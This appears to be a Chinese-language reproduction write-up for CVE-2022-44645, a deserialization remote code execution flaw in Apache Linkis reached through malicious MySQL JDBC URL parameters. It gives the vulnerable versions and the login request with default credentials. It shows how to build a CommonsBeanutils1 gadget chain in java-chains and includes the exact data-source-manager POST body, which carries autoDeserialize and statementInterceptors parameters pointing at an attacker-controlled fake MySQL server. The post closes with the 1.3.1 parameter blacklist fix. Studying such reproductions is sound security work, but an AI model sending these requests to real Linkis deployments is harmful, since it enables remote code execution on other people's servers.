当前位置: 首页 > news >正文

CVE-2022-44645漏洞复现

漏洞原理

该漏洞的核心本质是:Apache Linkis 在允许用户配置或测试数据源时,未能对用户输入的 MySQL JDBC URL 参数进行严格的过滤与黑名单限制。攻击者可以通过配置恶意的 JDBC URL,诱导 Linkis 连接到一个受控的恶意 MySQL 服务器,从而触发客户端(Linkis)利用MySQL Connector/J驱动执行反序列化攻击,最终实现远程代码执行(RCE)

组件名称受影响版本修复版本备注
Apache Linkis≤ 1.3.0Apache Linkis 1.3.1 及以上版本核心在于限制了数据源连接字符串的参数
MySQL Connector/J5.x 和 8.x 多个历史版本驱动层面的补丁依赖于特定参数的开启

复现

漏洞触发的“大前提”三要素

要成功复现或防范 CVE-2022-44645,必须以下三个条件同时满足,缺一不可:

  1. 宿主中间件:Apache Linkis 版本 $\le$ 1.3.0(未过滤 JDBC 恶意的 URL 参数)。

  2. 驱动版本:Linkis 的类路径中引入的是上述受影响范围内的MySQL Connector/J(如随大数据平台自带的旧版mysql-connector-java-5.1.x.jar)。

  3. 环境 Gadget:Linkis 自身包含可被反序列化利用的链(例如自带的Commons-Beanutils 1.9.4)。

复现环境

靶机ip: 192.168.10.142

攻击机ip: 192.168.10.81项目地址

Linkis服务由约七个微服务组成,完全启动需要1到2分钟。启动完成后,API网关地址为http://your-ip:9001,Eureka注册中心地址为http://your-ip:20303,默认账号密码为hadoop / hadoop

该靶场很简洁,能够访问到9001端口就行,就是以下该界面

抓包,更换表单成为以下

POST /api/rest_j/v1/user/login HTTP/1.1 Host: your-ip:9001 Content-Type: application/json {"userName":"hadoop","password":"hadoop"}

拿到会话 Cookie

M7UZXQP9Ld0ykKbI5lLyUHN8+fGTma8b2HLiVea4FcQ=;

打开java-chains

//复现前需要先准备一个能响应MySQL握手与查询请求、并在响应中下发Java反序列化Payload的恶意MySQL服务端。


//并基于Linkis classpath中自带的Commons-Beanutils 1.9.4链生成反序列化Payload。下图展示了在java-chains中构造FakeMySQLPayload → CommonsBeanutils1 → TemplatesImpl → BytecodeConvert → Exec这条链(命令为**touch /tmp/success**),生成结果中会返回一个短的字母数字MySQL用户名Token(例如dd14fff),恶意服务端会用这个Token来匹配后续JDBC客户端连接。

接下来,先登录Linkis获取会话Cookie,然后向数据源管理的op/connect/json接口发送一次请求。data-source-manager只识别hostportusernamepasswordparams这5个键,因此恶意的JDBC URL参数需要以JSON字符串的形式放入connectParams.params字段:

POST /api/rest_j/v1/data-source-manager/op/connect/json HTTP/1.1 Host: your-ip:9001 Content-Type: application/json;charset=UTF-8 Cookie: linkis_user_session_ticket_id_v1=... { "dataSourceName": "evil", "dataSourceTypeId": 1, "createSystem": "Linkis", "connectParams": { "host": "attacker-ip", "port": "3308", "username": "dd14fff", "password": "x", "params": "{\"autoDeserialize\":\"true\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"useSSL\":\"false\",\"maxAllowedPacket\":\"16777216\"}" } }

记得修改下面框框里的

发送,出现连接失败才是正确的

成功

补充

Linkis 1.3.1引入的修复在SecurityUtils#checkJdbcConnParams中加入了JDBC URL参数黑名单,禁止使用autoDeserializeallowLoadLocalInfileallowLocalInfileallowUrlInLocalInfile#等参数,从而阻断该利用路径;后续版本针对这一黑名单的多次绕过(CVE-2023-27987、CVE-2023-29215、CVE-2023-46801)又持续做了加固。

http://www.gsyq.cn/news/1625463.html

相关文章:

  • 开源商城系统对比:CRMEB vs shopXO vs mall4j vs tigshop横向评测
  • AI大模型开发知识
  • [0514]AI EDITOR VIBE_LOG
  • 佳易王计时计费软件|会员卡类型设置详细教程(SaaS云端版)
  • 环形链表(LeetCode 141)C语言最佳解题思路
  • TVA在具身智能技术演进中的独特价值(5)
  • ML模型服务化实战:从Notebook到高稳生产环境
  • SQL注入攻防体系构建:从原理到实战的全面指南
  • Python图片处理:基于Gradio构建启动后在浏览器打开交互界面,支持上传图片、自由拖拽4个顶点实现任意角度拉伸压缩、并添加文字
  • 【Java毕业设计】基于 SpringBoot 的企业员工薪酬绩效统计分析系统的设计与实现 基于 SpringBoot 的一体化员工人事薪资合同管理系统(源码+文档+远程调试,全bao定制等)
  • 艺术涂料刷涂工艺?一次说到位
  • AI落地漏斗:从POC到规模化ROI的工程化实践指南
  • Autoware与Apollo开源自动驾驶平台核心对比
  • 电驱蚊器有毒吗?最先进的灭蚊神器是什么牌子?十款质量不错灭蚊器榜单对比实测! 避坑贴!
  • HS2-HF Patch:一站式解决Honey Select 2汉化、去码与插件管理的终极方案
  • 从 ASCII 到 UTF-8:一部字符集的发展史
  • 从Notebook到生产环境的ML模型落地实战指南
  • VirtualAPK插件化安全加固:从DEX加密到函数抽取的纵深防御实践
  • 软件审计风暴下,企业如何用自动化工具守住合规底线?
  • 【全英文期刊收集】
  • 三步永久保存微信聊天记录:WeChatMsg让你的数字记忆永不丢失
  • Claude API 销售话术优化:从客户异议到成交建议
  • DRG存档编辑器:5分钟掌握《深岩银河》游戏数据修改技巧
  • 线性回归实战:从最小二乘到残差诊断与模型解释性
  • Casdoor实战:从统一身份认证到AI网关的部署与集成指南
  • Navicat Mac版无限试用重置终极指南:三种免费方法快速恢复14天试用期
  • Coze平台AI智能体开发实战:从角色定义到多智能体协作
  • Linux 文件查找练习
  • Python接口自动化:从Requests、Pytest到Allure的完整框架搭建指南
  • Java毕设选题推荐:基于 SpringBoot 的垃圾分类宣传与智能监管系统的设计与实现 基于 SpringBoot 的社区垃圾投放记录统计分【附源码、mysql、文档、调试+代码讲解+全bao等】